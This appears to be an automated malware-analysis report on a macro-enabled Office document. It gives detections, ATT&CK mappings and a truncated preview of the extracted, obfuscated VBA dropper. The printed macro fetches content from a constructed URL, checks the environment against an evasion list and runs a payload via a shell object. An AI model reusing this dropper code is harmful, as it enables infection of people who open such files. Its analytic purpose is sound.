MALICIOUS
142
Risk Score
Malware Insights
MITRE ATT&CK
T1059.005 Visual Basic
T1566.001 Spearphishing Attachment
T1203 Exploitation for Client Execution
The sample contains VBA macros and a 'CreateObject' call, indicative of malicious intent. It also includes a lure to enable macros, a common tactic for malware droppers. The VBA script attempts to download and execute a second-stage payload from a constructed URL, which is obfuscated but appears to be 'http://m.example.com/win/malware.exe'.
Heuristics 5
-
ClamAV: Doc.Dropper.Agent-6430108-0 critical CLAMAV_DETECTIONClamAV detected this file as malware: Doc.Dropper.Agent-6430108-0
-
VBA macros detected medium 1 related finding OLE_VBA_MACROSDocument contains VBA macro code
-
CreateObject call high OLE_VBA_CREATEOBJCreateObject call
-
Macro/content-enable lure medium SE_ENABLE_LUREDocument instructs the user to enable macros or editing — a common technique used by malware droppers to bypass Office macro security settings
-
Embedded URL info EMBEDDED_URLOne or more URLs were extracted from the document. The URL itself is not a detection — see the per-URL labels for which channel (macro, JS, link annotation, document body, ...) reached each URL.URL http://schemas.openxmlformats.org/drawingml/2006/main In document text (OLE body)
Extracted artifacts 1
Files carved from inside the sample during analysis.
| Filename | Kind | Source | Size |
|---|---|---|---|
macros.bas |
vba-macro | oletools.olevba.extract_macros (decoded VBA source) | 7958 bytes |
SHA-256: 89ca7c9a8d4a235f8fce4b6afc6d2f29543e4330fdc5fef6fc0cde5dbf2b1e90 |
|||
Preview scriptFirst 1,000 lines of the extracted script
Attribute VB_Name = "ThisDocument"
Attribute VB_Base = "1Normal.ThisDocument"
Attribute VB_GlobalNameSpace = False
Attribute VB_Creatable = False
Attribute VB_PredeclaredId = True
Attribute VB_Exposed = True
Attribute VB_TemplateDerived = True
Attribute VB_Customizable = True
Dim PRaKyjM As Boolean
Public Sub Kophy_Painted(ByVal CVzmc As Long, ByVal KXjoOyz As IInkRectangle)
VhlGqZ
End Sub
Public Sub VhlGqZ()
If PRaKyjM Then Exit Sub
PRaKyjM = True
CpRHiT
End Sub
Public Sub CpRHiT()
On Error GoTo naItg
FaHPqxZ
dXiGc
xHoVxqt
RprcZ
CTcpAe
Set EzUIwz = zXBNP(CreateObject(blEkIw))
IfGeql EzUIwz.Run(TGTuMO, 0)
Exit Sub
naItg:
End Sub
Public Sub CTcpAe()
ecuxFoK = KNOufK
If Not padmwQL(ecuxFoK, a("LoWAOENAxjsbCAI", 98, 139)) Then Error 105
If cHKFVJ(ecuxFoK, LyTBu) Then Error 106
End Sub
Public Function KNOufK() As String
Set xsJTL = CreateObject(a("qnHN5einr.RWiCtp.WxstpjiettC1uHtt.", 131, 221))
bAHiGQC xsJTL.Open(NlGWd, rUNcKU, qXVeFZk)
bAHiGQC xsJTL.SetRequestHeader(DMlFVK, vicWYgz)
bAHiGQC xsJTL.SetRequestHeader(a("A-resUQUbvreGJtneg", 35, 41), a("S 0WdsT. in5)OiMia.(mtl I7;io 0Tdt.sSPol/0cpieME. nwN6;re/0nPszl4 oab;", 521, 583))
bAHiGQC xsJTL.Send
If xsJTL.Status = 200 Then
KNOufK = xsJTL.ResponseText
End If
End Function
Public Function DMlFVK() As String
DMlFVK = a("LrerefeRzFcHiOP", 89, 22)
End Function
Public Function vicWYgz() As String
vicWYgz = a("mnpYwmyP/.espicdha/-Qw/-u/c-ssnartxlaM.eiWwomQ:dtetmodz", 567, 126)
End Function
Public Function rUNcKU() As String
rUNcKU = a("/ct.aTe/tdav.z/scixpwmot1xmo/y.h2mkg:ino/wemp/mSiw", 121, 531)
End Function
Public Function qXVeFZk() As Boolean
qXVeFZk = False
End Function
Public Function NlGWd() As String
NlGWd = a("EnVTcazkGcr", 102, 74)
End Function
Public Function padmwQL(ByVal UycGe As String, ByVal WorbP As String) As Boolean
padmwQL = InStrRev(UCase(UycGe), UCase(WorbP)) <> 0
End Function
Public Function cHKFVJ(ByVal UycGe As String, ByVal ItmiOs) As Boolean
For Each WorbP In ItmiOs
If padmwQL(UycGe, WorbP) Then GoTo xEhxX
Next
Exit Function
xEhxX:
cHKFVJ = True
End Function
Public Sub bAHiGQC(ByVal rWUfq)
End Sub
Public Function LyTBu()
LyTBu = IfGeql(Array(a("wrrLotfnhc crpJIo", 88, 168), a("tONTsRLyeYOotCUngnHkGisNI E", 221, 265), a("llJqMtO UBqJZAAcE", 144, 26), a("eNhOxTIjOyPbRAuR", 153, 22), a("bmHtluavMVHrhKS", 149, 129), _
a("ToOlVYemaAkKRPkcWHsUCKBqB", 56, 172), a("xckXgeSRlopAXeACK", 21, 160), a("EJEToNqqarTdBCvRaW", 113, 191), a("wTsUrtFAHBniXAevA", 169, 90), a("toYVwhF CsZAPsj", 152, 16), _
a("Cg vBdOknRHeCGrixTM", 187, 93), a("GIshOWbsnToGsfd", 157, 93), a("mooUgoeNlaudyANSa", 107, 111), a("bpFZncXNOottefmirx", 43, 38), a("DEuDAuoidOEtSPcSL", 126, 88), _
a("rrpduTCBnyqIWeotMz", 31, 167), a("foisJFTpRoewoNbppf", 29, 141), a("gvMlgSbUaemerEAiSsO", 49, 192), a("EzSVCCwEeCbLrr", 89, 16), a("sErBLllNBGLops ,Te", 197, 163), _
a("wafIentCMXRxvO", 25, 47), a("SEMgAtcIDAwAmxGf", 133, 162), a("iXaneSazoFKmoe", 145, 104), a("EcGNAdISaRamkdMc", 171, 36), a(" scqeDnUTOeDrATTGai", 135, 201), _
a("vkjGrYILATiPSoHe", 143, 62), a("odbcBujMlWDEN", 96, 133), a("AVOneIstYOEffRfj", 99, 65), a("ZLdLfreNzTeHbaf", 104, 116), a("EdzdSuCKALLceFR", 32, 77), _
a("seTiCrsftHnqtMOd", 103, 55), a("olQhrEcnXodRALu", 142, 82), a("rleIeOyueSvFcie", 17, 116), a("vPQenfdiOalOrDEETBj", 104, 207), a("PceCFMGfSINeXHw", 128, 158), _
a("ioeteMwPrrSDIsvNVtROAkAN", 157, 103), a(" pCEaAYCllFEtONCo", 157, 171), a("XACMGgnTRLYG", 67, 61), a("sohLLqhmiUSDet", 69, 100), a("AHiTAOceUlBCcYDw", 143, 122), _
a("isyTeUycWJutjRiQ", 163, 97), a("EmNrEvOgPLrMrYFRtN", 143, 79), a("itsNRVVIujeCTNiRdY", 95, 80), a("czPvoCSOhgFEi", 20, 70), a("eavpnAJrCQDttQyEDf", 187, 106), _
a("HsQdJyPf.HLepcIoEW", 185, 171), a("tlhrMFOcajeosJ", 65, 54), a("rHClilMtefoOCSgOV", 49, 40), a("YiwIMEzDneCjDBME", 151, 94), a("EeoBaPgSFIeiVwLn", 67, 110)))
End Function
Public Function blEkIw() As String
blEkIw = a("qc.laStluWpeNEihHTrSG", 227, 51)
End Function
Public Sub dXiGc()
If pdLnG < pgpSg Then Error 101
End Sub
Public Function pdLnG() As Int
... (truncated)
|
|||
Open this report in the interactive analyzer, or submit your own file for analysis.